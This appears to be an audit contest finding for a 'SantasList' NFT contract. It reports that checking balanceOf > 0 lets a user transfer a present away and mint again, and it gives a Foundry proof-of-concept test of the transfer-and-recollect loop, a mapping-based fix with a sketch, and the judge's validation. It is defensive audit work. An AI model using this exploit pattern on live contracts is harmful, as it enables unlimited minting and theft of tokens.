Submission Details
Severity: high
Valid

Same address can mint multiple NFTs.

Summary

Ironically, due to an insufficient check, any user on the Nice or Extra Nice list can mint and steal as many NFTs as they like.

Vulnerability Details

As long as they are Nice or Extra Nice, a user can bypass the 1 per address limit by just transferring to an alternate wallet and then recollecting on their original.

POC:

    function testCollectMultipleNFTs() public {
        address alternate_wallet = makeAddr("Users's other wallet");
        vm.startPrank(santa);
        santasList.checkList(user, SantasList.Status.NICE);
        santasList.checkTwice(user, SantasList.Status.NICE);
        vm.stopPrank();
        vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

        // Collect 1, try to collect a 2nd, but it reverts.
        vm.startPrank(user);
        santaToken.approve(address(santasList), 1e18);
        santasList.collectPresent();
        vm.expectRevert();
        santasList.collectPresent();

        // Now we just transfer to our other wallet, collect a new present, rinse and repeat.
        santasList.transferFrom(user, alternate_wallet, 0);
        santasList.collectPresent();
        vm.stopPrank();

        vm.prank(alternate_wallet);
        santasList.transferFrom(alternate_wallet, user, 0);
        assertEq(santasList.balanceOf(user), 2);
    }

Impact

High impact. Users can mint an infinite number of presents.

Tools Used

Foundry testing.

Recommendations

Keep a mapping (address=>bool) to see if a user has collected their present or not.
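
A sketch of the recommended mapping next to the balance-based check, as an added example that is not the audited contract's code. PresentSketch, collectPresentWeak, collectPresentFixed, hasCollected and the simplified owner-only transferFrom are hypothetical names, and the Nice/Extra Nice status and Christmas time checks are left out to isolate the collected check.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration (hypothetical contract): a stripped-down token with just
// enough ownership tracking to contrast the two "already collected" checks.
contract PresentSketch {
    error AlreadyCollected();
    error NotOwner();

    mapping(uint256 => address) public ownerOf;
    mapping(address => uint256) public balanceOf;
    // Recommended fix: a per-address flag that a transfer cannot reset.
    mapping(address => bool) public hasCollected;
    uint256 private nextTokenId;

    // Weak check: the caller's balance returns to 0 as soon as the present
    // is transferred away, so the same address passes this check again.
    function collectPresentWeak() external {
        if (balanceOf[msg.sender] > 0) revert AlreadyCollected();
        _mint(msg.sender);
    }

    // Hardened check: the flag is set once, before minting, and no other
    // function in the contract ever clears it.
    function collectPresentFixed() external {
        if (hasCollected[msg.sender]) revert AlreadyCollected();
        hasCollected[msg.sender] = true;
        _mint(msg.sender);
    }

    // Simplified owner-only transfer (no approvals), enough to show that
    // moving a token changes balanceOf but leaves hasCollected untouched.
    function transferFrom(address from, address to, uint256 tokenId) external {
        if (msg.sender != from || ownerOf[tokenId] != from) revert NotOwner();
        ownerOf[tokenId] = to;
        balanceOf[from] -= 1;
        balanceOf[to] += 1;
    }

    function _mint(address to) private {
        uint256 tokenId = nextTokenId++;
        ownerOf[tokenId] = to;
        balanceOf[to] += 1;
    }
}
```

Replaying the POC's collect, transfer, collect sequence against collectPresentFixed reverts with AlreadyCollected on the second collect, while the same sequence against collectPresentWeak mints a second token.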

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
